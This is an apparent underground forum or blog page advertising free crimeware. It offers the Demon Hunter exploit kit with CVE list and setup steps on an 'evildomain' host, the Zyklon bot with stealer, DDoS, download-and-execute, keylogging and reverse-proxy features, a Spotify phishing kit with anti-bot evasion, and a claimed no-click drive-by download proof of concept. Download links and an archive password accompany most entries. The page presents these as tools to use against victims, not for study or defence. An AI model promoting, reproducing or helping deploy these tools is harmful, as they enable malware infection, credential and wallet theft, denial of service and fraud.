Bild

Demon Hunter Exploit Kit [Free Exploit kit]

Categories Scene Scriptz

Demon Hunter Exploit Kit 1.0 (01.11.2014)
Exploits
Java
CVE-2010-0842
CVE-2010-3552
Oracle Java SE Remote Java Runtime Environment Vulnerability (CVE-2013-2460)
Signed Applet
Adobe
CVE-2008-2992
CVE-2010-1297
CVE-2010-2884
CVE-2010-0188
Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2013-2551)

How to install?its really easy!
1) go and change www.evildomain.com/demonhunter/config.php file (base user password ,login,password etc)
2) go to www.evildomain.com/demonhunter/install and install datebase to u host
3) go to www.evildomain.com/demonhunter/statistics/statistics.php and login up
4)change payload.exe to ur exe file and call ir “payload.exe”
Link for traff is www.evildomain.com/demonhunter/index.php

% of payload mix is 7-11%,ru is 5-7%,usa is 7-10%,for start it is very nice….
Will continue to work!

https://github.com/kurtcoke/DemonHunter_Exploitkit

Zyklon HTTP | DDoS | Stealer | Rev.Proxy | Feature Rich

Categories Scene Scriptz
Zyklon HTTP | DDoS | Stealer | Rev.Proxy | Feature Rich
Zyklon HTTP | DDoS | Stealer | Rev.Proxy | Feature Rich

Stealers

BTC Wallets
Game Licenses
Browser Recovery
Email Recovery
Software Licenses

DDoS

ARME
Bandwidth Exhaustion

HTTP Post Flood
HTTP Get Flood
UDP Flood
TCP Flood
SYN Flood
SlowLoris

DEXE Features
Download to Location
Download to Location and Execute
Download And Execute
Download And Execute (use commandline args)
Download and Inject
Download and Inject (to specific process)
Download and Inject (use commandline args)

Update
Update (confirm MD5 hash)

Proxy Server
Start Reverse Socks5 Proxy

Group

Change Group

Webpages

Visit Webpage Visibly

Visit Webpage Hiddenly

Set Homepages (Chrome, Firefox, IE)

Shell

Submit Shell Command

Uninstall

Uninstall

Key-logging

Automatic Logs


https://anonfile.com/Dbb847w3bf/Zyklon_rar

Pass: HCNulled

Private Spotify Scam page 2019 | 22+ language

Categories Scene Scriptz

Private Spotify Scam page 2019 | 22+ language

Private Spotify Scam page 2019 | 22+ language
Private Spotify Scam page 2019 | 22+ language

Over 22 Language ⭐

Mobile friendly
Anti proxy
Anti vpn
Anti bot servers
Source code encryption
Name encryption
Multi-Languages
VBV/3D All country [ ON/OFF ]
Local result
Country Lock [ ON/OFF ]


Download Spotify Scam.rar from SendSpace

Silent Java drive by Script(Exploit)

Categories Scene Scriptz

Silent Java drive by Script(Exploit)

Silent Java drive by Script(Exploit)
Silent Java drive by Script(Exploit)

Bowser Silent Exploitation (2018) POC:

Since 2010 I was following the browser exploits of (Silent Java drive by) methods and techniques, and after 2016 I’ve never heard of another “silent drive by” on the Markets, but another critical thing came through Browser Local storage.

This is a working example of a HTML/JavaScript browser storage exploitation.

as an example, to show how an attacker could force any PC system to download a executable file onto the system just directing the victim to visit a webpage no clicks needed.

Unlike the old Java Drive by methods which have been patched for many years, which used jar applets to allow VBS to execute on the local systems browser TMP folder.

This exploit works by using the browser Local Storage abilities, 90% of web browsers have built in Local Storage cache abilities which allow the them to store files onto the system and reference to these files later when re visiting the website. This allows the browser to reload images and video / SWF content of the website faster than it would normally load the content on the webpage by download.

Download browser-exploit-POC-master.rar from SendSpace